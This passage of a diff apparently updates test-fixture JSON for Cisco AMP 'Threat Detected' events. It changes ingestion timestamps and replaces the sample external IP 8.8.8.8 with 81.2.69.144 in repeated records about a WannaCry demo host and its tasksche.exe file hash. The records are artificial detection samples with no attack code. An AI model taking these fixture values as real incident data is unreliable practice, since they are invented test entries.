Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010901900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4363,7 +4363,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4409,7 +4409,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4426,8 +4426,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798772697Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010906400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4449,7 +4449,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4495,7 +4495,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4512,8 +4512,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798774907Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010910200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4535,7 +4535,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4581,7 +4581,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4598,8 +4598,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798777126Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010914400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4621,7 +4621,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4667,7 +4667,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4684,8 +4684,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798779340Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010919700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4707,7 +4707,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4753,7 +4753,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4770,8 +4770,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798781577Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010923700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4793,7 +4793,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4839,7 +4839,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4856,8 +4856,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798783833Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010927600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4879,7 +4879,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4925,7 +4925,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4942,8 +4942,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798786045Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010931700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4965,7 +4965,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5011,7 +5011,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5028,8 +5028,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798788263Z", - "original": 